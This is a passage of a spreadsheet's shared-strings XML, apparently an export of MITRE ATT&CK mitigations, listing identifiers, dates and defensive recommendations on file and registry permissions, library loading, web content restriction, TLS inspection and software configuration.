    <t>Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--f470dae2-81c9-48c4-aeab-27cebe318a09</t>
  </si>
  <si>
    <t>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level.</t>
  </si>
  <si>
    <t>relationship--10625b4c-7ecc-49a0-b8e3-c9f2d8cba2da</t>
  </si>
  <si>
    <t>relationship--511f21a9-50eb-47ff-b714-90c485bca8d0</t>
  </si>
  <si>
    <t>Grant access to application deployment systems only to a limited number of authorized administrators.</t>
  </si>
  <si>
    <t>relationship--43eebb80-4b8a-4690-a7e3-5f6f8e08db9f</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</si>
  <si>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</si>
  <si>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relationship--fbba8143-52be-4b81-8af7-94518799faaa</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</si>
  <si>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</si>
  <si>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relationship--f5316001-db89-4c59-8a58-abf12f439c58</t>
  </si>
  <si>
    <t>Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.</t>
  </si>
  <si>
    <t>relationship--6dc1f5ca-8881-4d06-b192-7bc502ea94ce</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to perform this technique.</t>
  </si>
  <si>
    <t>relationship--49f4c3d1-25a1-49e1-af9f-80a4c2eb4bf7</t>
  </si>
  <si>
    <t>relationship--3ab372ea-c8be-4fb1-a9d3-4aa542e1f10f</t>
  </si>
  <si>
    <t xml:space="preserve">The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. </t>
  </si>
  <si>
    <t>relationship--b8d33b58-e0d0-4bf8-a8ec-f6c4c2f1a480</t>
  </si>
  <si>
    <t xml:space="preserve">Limit access to the root account and prevent users from creating and/or modifying systemd timer unit files. </t>
  </si>
  <si>
    <t>relationship--e8001e2b-a639-458e-98f1-816a58830562</t>
  </si>
  <si>
    <t>27 July 2021</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</si>
  <si>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</si>
  <si>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relationship--6223d178-5cf3-4c84-84f1-583895468915</t>
  </si>
  <si>
    <t>relationship--d42d35c6-de42-4a3b-ada1-da6e87023192</t>
  </si>
  <si>
    <t>relationship--1422f68c-e962-4a13-8074-77f5b99b7718</t>
  </si>
  <si>
    <t>relationship--e30864c0-df50-403b-9ad0-ef744a5d7449</t>
  </si>
  <si>
    <t>relationship--72904b3d-5b24-4698-8094-8919f3bda494</t>
  </si>
  <si>
    <t>relationship--89887815-acfc-42f9-9172-81437cf9ff69</t>
  </si>
  <si>
    <t>Do not allow administrator accounts that have permissions to modify the Web content of organization login portals to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>relationship--adffe817-2460-49c7-be30-44afea58d7f8</t>
  </si>
  <si>
    <t>31 March 2020</t>
  </si>
  <si>
    <t>relationship--2a7a152f-79c9-45c9-9f09-0d39f563ad05</t>
  </si>
  <si>
    <t>01 September 2020</t>
  </si>
  <si>
    <t>Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>relationship--1e0c4d65-a4db-42e0-9eb0-93354ad56d06</t>
  </si>
  <si>
    <t>Prevent credential overlap across systems of administrator and privileged accounts.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>relationship--a8e5b5ae-85ca-48da-b3a0-36da1162034d</t>
  </si>
  <si>
    <t>If the service is necessary, lock down critical enclaves with separate WinRM accounts and permissions.</t>
  </si>
  <si>
    <t>relationship--335d97be-914a-4198-aa06-55095e850ffc</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>course-of-action--72dade3e-1cba-4182-b3b3-a77ca52f02a1</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</si>
  <si>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</si>
  <si>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relationship--80e94f61-c860-4cea-8d0e-c1dc88454bb5</t>
  </si>
  <si>
    <t>Enabled features, such as Protected Process Light (PPL), for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t>relationship--83f862a4-cfac-4665-8ff8-60df70a636f4</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</si>
  <si>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</si>
  <si>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relationship--26bc4aac-e7db-426f-af9f-b85fa60df277</t>
  </si>
  <si>
    <t>On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t>relationship--871cce82-c9fe-47e3-bd03-94a29a295f90</t>
  </si>
  <si>
    <t>relationship--ef18d02f-bc68-48d8-8076-10e171fde390</t>
  </si>
  <si>
    <t xml:space="preserve">
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t>relationship--a6f27258-cf6a-4d75-a3f0-5de085d528d2</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</si>
  <si>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</si>
  <si>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relationship--43bcf0ae-d0ff-4653-93c7-0c03eee5e5c2</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea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</si>
  <si>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</si>
  <si>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relationship--4df90c69-8ac5-4f22-b0cf-dd4debb8e051</t>
  </si>
  <si>
    <t>Forward logging of historical data to remote data store and centralized logging solution to preserve historical command line log data.</t>
  </si>
  <si>
    <t>relationship--75116ba9-f247-4c5b-b966-007bb61517e5</t>
  </si>
  <si>
    <t>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.</t>
  </si>
  <si>
    <t>relationship--17c78374-26ca-40a8-935b-04327c503742</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</si>
  <si>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</si>
  <si>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relationship--d6afb4c9-f0e5-4a52-a012-8a30a934207f</t>
  </si>
  <si>
    <t>relationship--2ffe5a2c-4f67-4254-badc-6b905d34621f</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</si>
  <si>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</si>
  <si>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relationship--bb01eb87-696e-496d-9fb9-5abe60b57b12</t>
  </si>
  <si>
    <t>relationship--5d1cba64-6732-4263-baee-32aa2ab81183</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</si>
  <si>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</si>
  <si>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relationship--6bc7c37c-ce58-4613-9401-e2f3f45f30fa</t>
  </si>
  <si>
    <t>relationship--60151204-5c0c-4d18-8582-4d0fad22ed08</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</si>
  <si>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</si>
  <si>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relationship--e4236234-0fd7-426f-b55a-d32364e3a64e</t>
  </si>
  <si>
    <t>relationship--745a30c5-d0d6-4405-b0f4-74c8630cd707</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>course-of-action--987988f0-cf86-4680-a875-2f6456ab2448</t>
  </si>
  <si>
    <t>The sudoers file should be strictly edited such that passwords are always required and that users can't spawn risky processes as users with higher privilege.</t>
  </si>
  <si>
    <t>relationship--b12a23ae-65f6-4226-8124-331ad59d1556</t>
  </si>
  <si>
    <t>Restrict write access to logon scripts to specific administrators.</t>
  </si>
  <si>
    <t>relationship--d32467b1-8d30-4134-ac6d-541cb623f8c2</t>
  </si>
  <si>
    <t>Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; or &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; files.</t>
  </si>
  <si>
    <t>relationship--9e7fc18e-06a3-437f-8e3b-18f5378c9d44</t>
  </si>
  <si>
    <t>Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>relationship--83202dd1-5822-476d-9fce-b1f77f2dce8f</t>
  </si>
  <si>
    <t xml:space="preserve">Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. </t>
  </si>
  <si>
    <t>relationship--7b89b499-2fc7-43cd-990f-297bdd15d2f3</t>
  </si>
  <si>
    <t>relationship--80a7d2d1-863e-43b5-b22d-72696c591206</t>
  </si>
  <si>
    <t>relationship--3642f351-831b-4c4f-b1d6-4673db4a70a1</t>
  </si>
  <si>
    <t>Restrict storage and execution of Control Panel items to protected directories, such as &lt;code&gt;C:\Windows&lt;/code&gt;, rather than user directories.</t>
  </si>
  <si>
    <t>relationship--2db67ddf-b414-4dc7-87ab-0846a8bd1e8e</t>
  </si>
  <si>
    <t>Restrict read/write access to system-level process files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>relationship--9e93d680-0e33-4577-97f6-da4e53f8ab78</t>
  </si>
  <si>
    <t>Restrict file shares to specific directories with access only to necessary users.</t>
  </si>
  <si>
    <t>relationship--f4ac7555-2b20-4345-998e-6ffc462cab03</t>
  </si>
  <si>
    <t>Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk.</t>
  </si>
  <si>
    <t>relationship--cafefef9-bf75-48e2-91e4-716988309f52</t>
  </si>
  <si>
    <t>Use access control lists on storage systems and objects.</t>
  </si>
  <si>
    <t>relationship--be61f77a-93a3-4699-b134-52b199c7b196</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</si>
  <si>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</si>
  <si>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relationship--2134ec34-cce0-4361-b9d9-8cdee10d9c52</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>relationship--e31f5737-0105-481d-9e12-e0986f752164</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>relationship--f36141b8-5dd8-462d-bfc3-b43e179e955c</t>
  </si>
  <si>
    <t>Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard dylib folders.</t>
  </si>
  <si>
    <t>relationship--36f7b849-03af-4567-be71-2e1eb1520b2a</t>
  </si>
  <si>
    <t>02 April 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Use access control lists on cloud storage systems and objects. </t>
  </si>
  <si>
    <t>relationship--e5ad94e4-f136-44d7-8000-7dd607538a7c</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</si>
  <si>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</si>
  <si>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relationship--79412658-c213-4746-b03d-c828957d6ddb</t>
  </si>
  <si>
    <t>Install software in write-protected locations. Set directory access controls to prevent file writes to the search paths for applications, both in the folders where applications are run from and the standard library folders.</t>
  </si>
  <si>
    <t>relationship--7253ab74-8fbb-422b-bf37-258981865b87</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t>relationship--b8113c99-fc84-4c2d-8925-cb1f5733f6eb</t>
  </si>
  <si>
    <t>Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls.</t>
  </si>
  <si>
    <t>relationship--5ba32510-89b8-4bba-8680-06602923e13e</t>
  </si>
  <si>
    <t>13 January 2021</t>
  </si>
  <si>
    <t>relationship--6db4729b-596c-43c1-81f4-d374a2f2e06b</t>
  </si>
  <si>
    <t>Set group policies to restrict file permissions to the &lt;code&gt;~/launchagents&lt;/code&gt; folder.(Citation: piazza launch agent mitigation)</t>
  </si>
  <si>
    <t>relationship--68146568-bc1f-49b6-9477-c6c06b0fa39c</t>
  </si>
  <si>
    <t>Applying more restrictive permissions to files and directories could prevent adversaries from modifying the access control lists.</t>
  </si>
  <si>
    <t>relationship--16ef64da-7119-42ad-ad73-e8a34a2b6a0f</t>
  </si>
  <si>
    <t>relationship--a04579db-cc93-4f62-88f1-c2cdc220ab70</t>
  </si>
  <si>
    <t>Use file system access controls to protect folders such as C:\\Windows\\System32.</t>
  </si>
  <si>
    <t>relationship--72de6e56-e5d1-4a3f-aa85-d7155f7ff42c</t>
  </si>
  <si>
    <t>Use file system access controls to protect folders such as C:\Windows\System32.</t>
  </si>
  <si>
    <t>relationship--026e7bb0-2037-4bfc-b9ae-98e70530f22a</t>
  </si>
  <si>
    <t>Restrict write access to the `/Library/Security/SecurityAgentPlugins` directory.</t>
  </si>
  <si>
    <t>relationship--a6aad172-c44b-4d21-9bf3-bb9c2dce2f67</t>
  </si>
  <si>
    <t>Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)</t>
  </si>
  <si>
    <t>relationship--67edd4b3-09f8-47c7-aaf1-6440524c78d4</t>
  </si>
  <si>
    <t>relationship--3884e1f8-c4ee-4337-b24c-1a5d2cecffc5</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</si>
  <si>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</si>
  <si>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relationship--5a70a968-618c-489e-8087-eabca740aa3a</t>
  </si>
  <si>
    <t>relationship--6a3e8d7c-fdb3-4249-9f4e-7825e253bbfd</t>
  </si>
  <si>
    <t>relationship--ca04cce0-2f47-4c73-956f-808573b62903</t>
  </si>
  <si>
    <t>Making PowerShell profiles immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>relationship--6b4cb169-cda8-49ef-a8db-188c599f50f1</t>
  </si>
  <si>
    <t>Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Additionally, on Cisco devices, set the `nonexportable` flag during RSA key pair generation.(Citation: cisco_deploy_rsa_keys)</t>
  </si>
  <si>
    <t>relationship--47c4478d-1526-4c4f-8158-17ad8cfcc6b9</t>
  </si>
  <si>
    <t>29 March 2023</t>
  </si>
  <si>
    <t xml:space="preserve">Restrict the permissions on sensitive files such as &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; or &lt;code&gt;/proc/[pid]/mem&lt;/code&gt;. </t>
  </si>
  <si>
    <t>relationship--49d40f3b-33b4-424c-a645-82d2a84e5c28</t>
  </si>
  <si>
    <t>Limit privileges of user accounts so only authorized users can edit the rc.common file.</t>
  </si>
  <si>
    <t>relationship--116ba54b-b2b3-4e63-9f5b-c5171dde0863</t>
  </si>
  <si>
    <t>relationship--ec56fe4c-c61c-45e3-82fb-44edd43540fc</t>
  </si>
  <si>
    <t>Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code.</t>
  </si>
  <si>
    <t>relationship--47640cbc-a128-4a78-b02e-d0b073809257</t>
  </si>
  <si>
    <t>Restrict storage and execution of SIP DLLs to protected directories, such as C:\\Windows, rather than user directories.</t>
  </si>
  <si>
    <t>relationship--ee2fcc2b-735d-4948-b25a-401f60fe7412</t>
  </si>
  <si>
    <t>Restrict access to the &lt;code&gt;authorized_keys&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>relationship--3bc431bd-f093-4daf-b264-e73f1fcf591a</t>
  </si>
  <si>
    <t>Ensure proper file permissions are set and harden system to prevent root privilege escalation opportunities.</t>
  </si>
  <si>
    <t>relationship--7b191418-e24b-4db1-98e1-a7ee56b271f6</t>
  </si>
  <si>
    <t>Ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.</t>
  </si>
  <si>
    <t>relationship--d107e5fd-53fc-478d-9040-85087070d7ff</t>
  </si>
  <si>
    <t>Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.</t>
  </si>
  <si>
    <t>relationship--e28dc4ab-86fe-480e-9f0d-d7fab54c432d</t>
  </si>
  <si>
    <t>Since StartupItems are deprecated, preventing all users from writing to the &lt;code&gt;/Library/StartupItems&lt;/code&gt; directory would prevent any startup items from getting registered.</t>
  </si>
  <si>
    <t>relationship--27c0f853-f7b0-43e9-b980-7965d1227a9e</t>
  </si>
  <si>
    <t>relationship--110e76f2-815d-4eb0-986f-f6a9905ce640</t>
  </si>
  <si>
    <t>relationship--800f4061-3347-4816-a633-179ede275505</t>
  </si>
  <si>
    <t>relationship--ce16e7b4-b78e-4587-bf65-8a0c0c370cc4</t>
  </si>
  <si>
    <t>Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>relationship--9d7f9d7b-c246-4849-b65e-1ac45208b427</t>
  </si>
  <si>
    <t>Restrict read/write access to systemd &lt;code&gt;.timer&lt;/code&gt; unit files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>relationship--2c6c988d-d843-4dc0-82be-b504e3c3a39c</t>
  </si>
  <si>
    <t>Protect shared folders by minimizing users who have write access.</t>
  </si>
  <si>
    <t>relationship--ecf9df35-e4f5-4041-a65d-0e897e5435b0</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block additions/modifications to W32Time DLLs. (Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>relationship--328fdf30-3195-4d15-b99c-bf14cc236a90</t>
  </si>
  <si>
    <t>Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.</t>
  </si>
  <si>
    <t>relationship--be36df4d-4180-4271-ae0a-a7677df40261</t>
  </si>
  <si>
    <t>20 August 2021</t>
  </si>
  <si>
    <t>relationship--8497e912-185d-403b-865e-17c4b02290d2</t>
  </si>
  <si>
    <t>relationship--376c4c97-bec7-455d-ac44-88b7cbd8bd43</t>
  </si>
  <si>
    <t>Restrict write access to XDG autostart entries to only select privileged users.</t>
  </si>
  <si>
    <t>relationship--5dcc5947-375c-4b73-867b-5beb6e333c69</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>course-of-action--e8242a33-481c-4891-af63-4cf3e4cf6aff</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</si>
  <si>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</si>
  <si>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relationship--92764952-45ad-4cfc-a426-c6baefc9974c</t>
  </si>
  <si>
    <t>relationship--46eeb6fa-2dcb-4c86-b79e-8891b2e72566</t>
  </si>
  <si>
    <t>Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>relationship--71bcc1dc-2392-448a-8133-f126fed08023</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>course-of-action--a2c36a5d-4058-475e-8e77-fff75e50d3b9</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for logon scripts that may lead to persistence.</t>
  </si>
  <si>
    <t>relationship--9e755287-a238-485c-83c3-7afeac5a9243</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys associated with COR_PROFILER.</t>
  </si>
  <si>
    <t>relationship--0c597fa3-aeb4-472c-9fba-6855e5d512b0</t>
  </si>
  <si>
    <t>25 June 2020</t>
  </si>
  <si>
    <t>Protect generated event files and logs that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>relationship--6127605c-df31-4810-a24c-77a965399c90</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for the Registry to prevent users from modifying keys related to code signing policies.</t>
  </si>
  <si>
    <t>relationship--f32c486c-37f6-48c2-bdff-f9468d7b9601</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering logging. The addition of the MiniNT registry key disables Event Viewer.(Citation: def_ev_win_event_logging)</t>
  </si>
  <si>
    <t>relationship--47845844-3465-4c87-aaa1-03e860cc3dab</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or modifying firewall settings.</t>
  </si>
  <si>
    <t>relationship--e2a9b959-8179-4ea0-99bc-8a8310bd1de2</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security services.</t>
  </si>
  <si>
    <t>relationship--a66c8397-99c0-494c-9cbe-4055e0b2f6a1</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.</t>
  </si>
  <si>
    <t>relationship--85422378-e9d7-4bd2-8b57-73fba0641448</t>
  </si>
  <si>
    <t>Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security/logging services.</t>
  </si>
  <si>
    <t>relationship--c0aa0cf1-4c03-4fdd-bdbb-65563bff4a81</t>
  </si>
  <si>
    <t>relationship--0f7dd352-4e6b-4852-a995-7b22c98b4fd2</t>
  </si>
  <si>
    <t>Restrict Registry permissions to disallow the modification of sensitive Registry keys such as `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`.</t>
  </si>
  <si>
    <t>relationship--1fea6d3f-b097-4e4e-b089-5abd6e2659e7</t>
  </si>
  <si>
    <t>relationship--81bb4898-aaa2-4dff-9af8-a97e6b69a95a</t>
  </si>
  <si>
    <t>13 August 2020</t>
  </si>
  <si>
    <t>relationship--1b63a6ee-50e9-4c72-8654-1d879f4eb88e</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</si>
  <si>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</si>
  <si>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relationship--90ad45d7-1980-4909-97f2-3c5a10a47deb</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to service and other critical server parameters in the Registry.(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>relationship--32c23405-9962-4f12-8774-fdf04328ac84</t>
  </si>
  <si>
    <t>Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.</t>
  </si>
  <si>
    <t>relationship--c00535d0-6e59-4293-8034-70e5bf94a74a</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation. </t>
  </si>
  <si>
    <t>relationship--469231fb-3797-49bf-9f23-078b37a35671</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</si>
  <si>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</si>
  <si>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relationship--a152969e-2530-4cb7-acdf-f93b138116d0</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to Terminal Services parameters in the Registry.(Citation: Microsoft System Services Fundamentals)</t>
  </si>
  <si>
    <t>relationship--3a3dd5f2-61af-4617-81b0-c12900f5f8e6</t>
  </si>
  <si>
    <t>Consider using Group Policy to configure and block modifications to W32Time parameters in the Registry. (Citation: Microsoft W32Time May 2017)</t>
  </si>
  <si>
    <t>relationship--08f53e1a-7326-48ed-ac0e-2b0af2d93985</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96</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</si>
  <si>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</si>
  <si>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relationship--90d8b716-a9b3-483a-b16b-fac062cbc6b0</t>
  </si>
  <si>
    <t>Web proxies can be used to enforce external network communication policy that prevents use of unauthorized external services.</t>
  </si>
  <si>
    <t>relationship--0d57e872-1062-4bab-b3c5-3cea17cba4dc</t>
  </si>
  <si>
    <t>Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.</t>
  </si>
  <si>
    <t>relationship--d4dbffc2-246d-4fd4-8c3c-0e7901aaef05</t>
  </si>
  <si>
    <t>Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files</t>
  </si>
  <si>
    <t>relationship--51c6ea7a-8978-4bd5-9cc1-7d80bb16e70b</t>
  </si>
  <si>
    <t>Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns.</t>
  </si>
  <si>
    <t>relationship--0005fb3b-274a-4ac1-8fb2-51366fcd1a6b</t>
  </si>
  <si>
    <t>relationship--5e165901-44c0-423e-972b-d626b0c7cebf</t>
  </si>
  <si>
    <t>In some cases a local DNS sinkhole may be used to help prevent DGA-based command and control at a reduced cost.</t>
  </si>
  <si>
    <t>relationship--909147b8-d0f8-4222-b62c-10f1d8bec2ec</t>
  </si>
  <si>
    <t>For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.</t>
  </si>
  <si>
    <t>relationship--7d8a729c-3656-4b31-85c0-42b75001f913</t>
  </si>
  <si>
    <t>In some cases a local DNS sinkhole may be used to help prevent behaviors associated with dynamic resolution.</t>
  </si>
  <si>
    <t>relationship--5632a2de-e231-4ef0-971b-6cdb2750d410</t>
  </si>
  <si>
    <t>Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.</t>
  </si>
  <si>
    <t>relationship--888cad71-2275-4ca6-a154-f297f972487c</t>
  </si>
  <si>
    <t>relationship--cf16ba1d-ea81-4301-a1a4-083e4a8927fe</t>
  </si>
  <si>
    <t>relationship--dc577c9d-db95-4dcb-ad15-5bb980f3aefb</t>
  </si>
  <si>
    <t>relationship--df392629-4630-44a8-92a2-418b414a793b</t>
  </si>
  <si>
    <t>Script blocking extensions can help prevent the execution of JavaScript and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.</t>
  </si>
  <si>
    <t>relationship--b432bca9-8f75-431d-b0af-f43623e287d4</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</si>
  <si>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</si>
  <si>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relationship--e37c2e11-8b96-4a9a-bc94-2995f54135dd</t>
  </si>
  <si>
    <t>relationship--b174970c-561c-4f92-9262-512d4de40e5e</t>
  </si>
  <si>
    <t>Determine if certain websites or attachment types (ex: .scr, .exe, .pif, .cpl, etc.) that can be used for phishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>relationship--a205b0ce-df00-40ae-b626-7dc3e8146d45</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</si>
  <si>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</si>
  <si>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relationship--f2f68eb7-4110-4750-9d1c-58774036672b</t>
  </si>
  <si>
    <t>Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>relationship--239092bc-09e4-4c16-9d83-071929c9e4a4</t>
  </si>
  <si>
    <t>Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.</t>
  </si>
  <si>
    <t>relationship--7f18d24e-fffe-413f-96ff-612b3e9bedd6</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</si>
  <si>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</si>
  <si>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relationship--25407fd4-3940-4446-9c17-6eebe902dbdf</t>
  </si>
  <si>
    <t>relationship--66551074-a1e3-439c-a996-c1f7ca8136e2</t>
  </si>
  <si>
    <t>relationship--a6360da7-8678-4d7c-a866-6f2a982a23ba</t>
  </si>
  <si>
    <t>relationship--970635e8-9767-4654-b6ff-e1cd12bc206e</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>course-of-action--7bb5fae9-53ad-4424-866b-f0ea2a8b731d</t>
  </si>
  <si>
    <t>SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols.</t>
  </si>
  <si>
    <t>relationship--bfb8c372-82f0-4bdb-8083-5fae8b8ef185</t>
  </si>
  <si>
    <t>If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.</t>
  </si>
  <si>
    <t>relationship--2d63a9e6-9be2-44ea-8276-89ae92049509</t>
  </si>
  <si>
    <t>relationship--d62449f0-cecd-466f-b3e8-c6908f48cfaa</t>
  </si>
  <si>
    <t>relationship--f229e2fb-3105-4ae5-abe1-d100209f702c</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>course-of-action--b5dbb4c5-b0b1-40b1-80b6-e9e84ab90067</t>
  </si>
  <si>
    <t>Allowlist MIB objects and implement SNMP views.(Citation: Cisco Securing SNMP)</t>
  </si>
  <si>
    <t>relationship--872ba9c6-8e0d-48af-864b-de83b906baf1</t>
  </si>
  <si>
    <t>Consider implementing policies on internal web servers, such HTTP Strict Transport Security, that enforce the use of HTTPS/network traffic encryption to prevent insecure connections.(Citation: Chromium HSTS)</t>
  </si>
  <si>
    <t>relationship--5969ad50-e47d-4d5f-96f0-c346e997d737</t>
  </si>
  <si>
    <t>Consider disabling embedded files in Office programs, such as OneNote, that do not work with Protected View.(Citation: Enigma Reviving DDE Jan 2018)(Citation: GitHub Disable DDEAUTO Oct 2017)</t>
  </si>
  <si>
    <t>relationship--9912d67b-153f-428e-9751-e6c09c8de945</t>
  </si>
  <si>
    <t>Configure browsers/applications to regularly delete persistent web credentials (such as cookies).</t>
  </si>
  <si>
    <t>relationship--ce647878-e4d9-4472-9777-b731edbd3d9a</t>
  </si>
  <si>
    <t>relationship--5be525da-5357-4d33-8664-ae74cc6fea02</t>
  </si>
  <si>
    <t>Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.</t>
  </si>
  <si>
    <t>relationship--73b3f761-2c2d-4ceb-8886-dd0bb0fc7fc4</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</si>
  <si>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</si>
  <si>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relationship--2981e224-edec-454e-91da-5dcad30572c1</t>
  </si>
  <si>
    <t>relationship--39a3fc74-012e-47fc-b806-d9267a0f54ba</t>
  </si>
  <si>
    <t xml:space="preserve">Allowlist MIB objects and implement SNMP views. Disable Smart Install (SMI) if not used.(Citation: Cisco Securing SNMP)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018) </t>
  </si>
  <si>
    <t>relationship--91baa343-383f-4010-b799-67e42bd8a016</t>
  </si>
  <si>
    <t>For the Office Test method, create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation. (Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>relationship--f6f38033-ddd4-418a-ad70-b1198df67fc3</t>
  </si>
  <si>
    <t>Create the Registry key used to execute it and set the permissions to "Read Control" to prevent easy access to the key without administrator permissions or requiring Privilege Escalation.(Citation: Palo Alto Office Test Sofacy)</t>
  </si>
  <si>
    <t>relationship--375f4ab4-542f-42f6-9577-f66a6e20f9ca</t>
  </si>
  <si>
    <t>Consider re-locking password managers after a short timeout to limit the time plaintext credentials live in memory from decrypted databases.</t>
  </si>
  <si>
    <t>relationship--cc2f4b77-5b2f-4942-a6c0-9c2a19e1f7b0</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</si>
  <si>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</si>
  <si>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relationship--7b090d29-d49d-4967-9843-90636bfb039f</t>
  </si>
  <si>
